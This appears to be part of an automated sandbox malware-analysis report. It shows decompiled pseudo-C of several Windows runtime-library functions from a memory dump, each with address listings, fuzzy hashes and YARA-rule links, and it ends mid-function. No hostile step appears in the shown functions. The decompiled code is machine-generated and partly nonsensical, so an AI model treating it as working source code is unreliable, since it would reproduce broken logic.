                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a81c776343e75bc2c2477eda22a0d0ec711ee614a124377484026d20f2ada069
                                                        • Instruction ID: e1bc0974e4aeb109518650bbbd3f472bbc810d23cd2cc8c615c6c2d9fabcc54a
                                                        • Opcode Fuzzy Hash: a81c776343e75bc2c2477eda22a0d0ec711ee614a124377484026d20f2ada069
                                                        • Instruction Fuzzy Hash: 4841A735A5021C9BDB61DF64CD44BEA77B4EF45710F014AA5EA08EB340EB78BE84CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E8A0A, Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E047E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x48cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0481B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E047EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x47b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04801DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04813C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E047E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                        0x047e8a0a
                                                        0x047e8a1c
                                                        0x047e8a23
                                                        0x047e8a2e
                                                        0x047e8a30
                                                        0x047e8a36
                                                        0x047e8a3c
                                                        0x047e8a3e
                                                        0x047e8a4a
                                                        0x047e8a52
                                                        0x047e8a9c
                                                        0x047e8aae
                                                        0x047e8a58
                                                        0x047e8a5e
                                                        0x047e8a6a
                                                        0x047e8a6f
                                                        0x047e8a75
                                                        0x047e8a7d
                                                        0x047e8a85
                                                        0x047e8a86
                                                        0x047e8a89
                                                        0x047e8a93
                                                        0x047e8a99
                                                        0x047e8a9b
                                                        0x00000000
                                                        0x047e8aaf
                                                        0x047e8abe
                                                        0x047e8ac3
                                                        0x047e8acb
                                                        0x047e8ad7
                                                        0x047e8ae0
                                                        0x047e8af1
                                                        0x00000000
                                                        0x047e8af1
                                                        0x047e8acd
                                                        0x047e8ad5
                                                        0x047e8afb
                                                        0x047e8afd
                                                        0x047e8aff
                                                        0x047e8b07
                                                        0x047e8b22
                                                        0x047e8b24
                                                        0x047e8b2a
                                                        0x047e8b2e
                                                        0x047e8b3f
                                                        0x047e8b78
                                                        0x047e8b41
                                                        0x047e8b52
                                                        0x047e8b54
                                                        0x047e8b5c
                                                        0x047e8b74
                                                        0x047e8b74
                                                        0x047e8b5c
                                                        0x047e8b3f
                                                        0x047e8b5e
                                                        0x047e8b61
                                                        0x047e8b64
                                                        0x047e8b64
                                                        0x047e8b6c
                                                        0x047e8b6c
                                                        0x047e8b11
                                                        0x04839cd5
                                                        0x04839cd5
                                                        0x047e8b17
                                                        0x047e8b1a
                                                        0x047e8b1a
                                                        0x00000000
                                                        0x047e8ad5
                                                        0x047e8a89

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 107fb586e198ba033f1b67b6e89f2f3bf6de139ec1ae8941c7a8b23c5230b3d0
                                                        • Instruction ID: b39f1d7376377f38853b19636627e2befe13f47ae513ba239d830cef57e860b6
                                                        • Opcode Fuzzy Hash: 107fb586e198ba033f1b67b6e89f2f3bf6de139ec1ae8941c7a8b23c5230b3d0
                                                        • Instruction Fuzzy Hash: 2F4142B0A402289BDB34DF5ADC88AB9B3B9EB48304F1146E9D919D7351E770AE80CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048569A6, Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E048569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x48cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L047E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04856BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04819980() >= 0) {
							E047F2280(_t56, 0x48c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x48c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x48c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E047DB6F0(0x47bc338, 0x47bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04819520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E048195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E047EFFB0(_t68, _t77, 0x48c8778);
				}
				_pop(_t78);
				return E0481B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                        0x048569b5
                                                        0x048569be
                                                        0x048569c3
                                                        0x048569c9
                                                        0x048569cc
                                                        0x048569d1
                                                        0x048569d3
                                                        0x048569de
                                                        0x048569e1
                                                        0x048569ea
                                                        0x048569f6
                                                        0x048569fe
                                                        0x04856a13
                                                        0x04856a14
                                                        0x04856a15
                                                        0x04856a16
                                                        0x04856a1e
                                                        0x04856a26
                                                        0x04856a31
                                                        0x04856a36
                                                        0x04856a37
                                                        0x04856a40
                                                        0x04856a49
                                                        0x04856a4a
                                                        0x04856a53
                                                        0x04856a59
                                                        0x04856a5d
                                                        0x04856a5e
                                                        0x04856a64
                                                        0x04856a67
                                                        0x04856a6a
                                                        0x04856a6d
                                                        0x04856a70
                                                        0x04856a77
                                                        0x04856a7d
                                                        0x04856a86
                                                        0x04856a89
                                                        0x04856a9c
                                                        0x04856a9f
                                                        0x04856aa2
                                                        0x04856aa5
                                                        0x04856aaf
                                                        0x04856ab1
                                                        0x04856ab8
                                                        0x04856ab9
                                                        0x04856abb
                                                        0x04856abe
                                                        0x04856ac5
                                                        0x04856ac5
                                                        0x04856aaf
                                                        0x04856a40
                                                        0x04856a26
                                                        0x048569fe
                                                        0x04856ace
                                                        0x04856ad0
                                                        0x04856ad3
                                                        0x04856ad8
                                                        0x04856adf
                                                        0x04856adf
                                                        0x04856ae8
                                                        0x04856aef
                                                        0x04856aef
                                                        0x04856af9
                                                        0x04856b06

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e4ef8ec3a8e85e7732fcee11ed115206b07bf7268958b922e59f87b286d84aa
                                                        • Instruction ID: 0406c606c7ab21c5d4c39fb920a9a19ed05d9b73448891ff3d6599668762914a
                                                        • Opcode Fuzzy Hash: 8e4ef8ec3a8e85e7732fcee11ed115206b07bf7268958b922e59f87b286d84aa
                                                        • Instruction Fuzzy Hash: 554182B1D412089FEB11DFA5C9407FEBBF8EF48714F04862AE818E3250EB74A945CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D5210, Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E047D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E047D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E048195D0();
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E047EEB70(_t54, 0x48c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E048195D0();
								L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E047EEB70(_t54, 0x48c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0481F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E047EEB70(_t54, 0x48c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E048195D0();
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                        0x047d5220
                                                        0x047d5224
                                                        0x04830d13
                                                        0x04830d16
                                                        0x04830d19
                                                        0x047d522a
                                                        0x047d522a
                                                        0x047d522d
                                                        0x047d522d
                                                        0x047d5231
                                                        0x047d5235
                                                        0x047d5239
                                                        0x04830d5c
                                                        0x04830d62
                                                        0x00000000
                                                        0x00000000
                                                        0x04830d6a
                                                        0x04830d7b
                                                        0x04830d7f
                                                        0x04830d81
                                                        0x04830d84
                                                        0x04830d95
                                                        0x04830d95
                                                        0x04830d6c
                                                        0x04830d71
                                                        0x04830d71
                                                        0x04830d9a
                                                        0x00000000
                                                        0x047d524a
                                                        0x047d524a
                                                        0x047d5250
                                                        0x04830d24
                                                        0x04830d35
                                                        0x04830d39
                                                        0x04830d3b
                                                        0x04830d3e
                                                        0x04830d50
                                                        0x04830d50
                                                        0x04830d26
                                                        0x04830d2b
                                                        0x04830d2b
                                                        0x00000000
                                                        0x04830d55
                                                        0x047d5256
                                                        0x047d525b
                                                        0x047d5265
                                                        0x04830da7
                                                        0x047d526b
                                                        0x047d526e
                                                        0x047d5272
                                                        0x04830db1
                                                        0x04830db4
                                                        0x04830dc5
                                                        0x04830dc5
                                                        0x047d5272
                                                        0x047d5278
                                                        0x047d527e
                                                        0x047d528a
                                                        0x047d528c
                                                        0x047d528d
                                                        0x00000000
                                                        0x047d5280
                                                        0x047d5282
                                                        0x047d5288
                                                        0x047d529f
                                                        0x047d5292
                                                        0x00000000
                                                        0x047d5292
                                                        0x00000000
                                                        0x047d5288
                                                        0x047d527e

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af750e4a0e835888e7ff046d00b1c4d5046187c58074984d6a9b6e3b957c8c16
                                                        • Instruction ID: 3caadb8ea7261fb63af0509719677179a3c320d3b966e27ab30716b56b8abdbe
                                                        • Opcode Fuzzy Hash: af750e4a0e835888e7ff046d00b1c4d5046187c58074984d6a9b6e3b957c8c16
                                                        • Instruction Fuzzy Hash: E6310331661600EBD7269F18C980F6677B9FF01765F104F2AE4568B7A4EB70F804CAD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04813D43, Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E04813D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E047E7B60(0, _t61, 0x47b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E047E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L047F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                        0x04813d4c
                                                        0x04813d50
                                                        0x04813d55
                                                        0x04813d5e
                                                        0x0484e79a
                                                        0x00000000
                                                        0x0484e79a
                                                        0x04813d68
                                                        0x0484e789
                                                        0x04813d9d
                                                        0x04813da3
                                                        0x04813daf
                                                        0x04813db5
                                                        0x04813dbc
                                                        0x04813dc4
                                                        0x04813dc9
                                                        0x04813dce
                                                        0x0484e7ae
                                                        0x0484e7ae
                                                        0x04813dde
                                                        0x04813de2
                                                        0x04813de7
                                                        0x04813e0d
                                                        0x04813e13
                                                        0x04813e16
                                                        0x04813e1e
                                                        0x04813e25
                                                        0x04813e28
                                                        0x00000000
                                                        0x00000000
                                                        0x04813e2a
                                                        0x04813e2f
                                                        0x04813e37
                                                        0x04813e37
                                                        0x00000000
                                                        0x04813e37
                                                        0x04813e31
                                                        0x00000000
                                                        0x04813e31
                                                        0x04813e20
                                                        0x04813e20
                                                        0x04813e35
                                                        0x00000000
                                                        0x04813de9
                                                        0x04813de9
                                                        0x04813de9
                                                        0x04813dee
                                                        0x04813dfd
                                                        0x04813dff
                                                        0x04813e02
                                                        0x04813e05
                                                        0x04813e05
                                                        0x00000000
                                                        0x04813df0
                                                        0x04813de7
                                                        0x0484e78f
                                                        0x0484e794
                                                        0x04813d79
                                                        0x04813d84
                                                        0x04813d89
                                                        0x04813d8e
                                                        0x00000000
                                                        0x0484e7a4
                                                        0x04813d96
                                                        0x04813d9a
                                                        0x00000000
                                                        0x04813d9a
                                                        0x00000000
                                                        0x0484e794
                                                        0x04813d6e
                                                        0x04813d73
                                                        0x00000000
                                                        0x0484e7b5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27fd3f7ff3a6b64263ac9a87259c8b43a0937923645c69a06a5664288e225dca
                                                        • Instruction ID: 82c13141c3ffa710e28672c764f3b9fba015c91638d692bf2a41dc54788525e6
                                                        • Opcode Fuzzy Hash: 27fd3f7ff3a6b64263ac9a87259c8b43a0937923645c69a06a5664288e225dca
                                                        • Instruction Fuzzy Hash: 7E31B031B00618DBE7248F29C881A7BBBE9FF95714B058A6AE845CB760E730E841D790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480A61C, Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E0480A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x48b0220);
				E0482D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x48c7b9c; // 0x0
				_t55 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0482D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x48c7b10 =  *0x48c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x48c536c; // 0x668e98
					if( *_t51 != 0x48c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x48c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x48c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0480A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                        0x0480a61c
                                                        0x0480a61e
                                                        0x0480a623
                                                        0x0480a628
                                                        0x0480a62b
                                                        0x0480a62d
                                                        0x0480a648
                                                        0x0480a64a
                                                        0x0480a64f
                                                        0x04849b44
                                                        0x0480a6ec
                                                        0x0480a6f1
                                                        0x0480a6f1
                                                        0x0480a655
                                                        0x0480a657
                                                        0x0480a65a
                                                        0x0480a65d
                                                        0x0480a662
                                                        0x0480a663
                                                        0x0480a667
                                                        0x0480a668
                                                        0x0480a66d
                                                        0x0480a706
                                                        0x0480a706
                                                        0x04849bda
                                                        0x04849be6
                                                        0x04849beb
                                                        0x00000000
                                                        0x04849beb
                                                        0x0480a679
                                                        0x04849b7a
                                                        0x00000000
                                                        0x04849b7a
                                                        0x0480a683
                                                        0x0480a6f4
                                                        0x0480a6f7
                                                        0x0480a6f9
                                                        0x0480a6fd
                                                        0x0480a6a0
                                                        0x0480a6a0
                                                        0x0480a6ad
                                                        0x0480a6af
                                                        0x0480a6b4
                                                        0x04849ba7
                                                        0x04849bac
                                                        0x00000000
                                                        0x00000000
                                                        0x04849bc6
                                                        0x04849bce
                                                        0x04849bd1
                                                        0x04849bd3
                                                        0x04849bd3
                                                        0x00000000
                                                        0x04849bd1
                                                        0x0480a6bd
                                                        0x0480a6c3
                                                        0x0480a6c6
                                                        0x0480a6d2
                                                        0x0480a701
                                                        0x0480a704
                                                        0x00000000
                                                        0x0480a704
                                                        0x0480a6d4
                                                        0x0480a6d6
                                                        0x0480a6d9
                                                        0x0480a6db
                                                        0x0480a6e1
                                                        0x0480a6e6
                                                        0x0480a6e8
                                                        0x0480a6e8
                                                        0x0480a6ea
                                                        0x00000000
                                                        0x0480a6ea
                                                        0x0480a688
                                                        0x0480a692
                                                        0x0480a694
                                                        0x0480a699
                                                        0x00000000
                                                        0x00000000
                                                        0x0480a69d
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba86f48f386440c96167a40535992827fb40dea85abd57f0b3baa039a8258ecf
                                                        • Instruction ID: 05e5c6ae35ebf4917433f692a63dd201deb0a54537dbeb464b9a097d5384e75e
                                                        • Opcode Fuzzy Hash: ba86f48f386440c96167a40535992827fb40dea85abd57f0b3baa039a8258ecf
                                                        • Instruction Fuzzy Hash: 8A412BB5A10219DFDB19CF68C890B99B7F1BB99304F15CA69D814EB380D774B941CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04857016, Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E04857016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x48cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04856B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04856B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E047F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04819AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0481B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
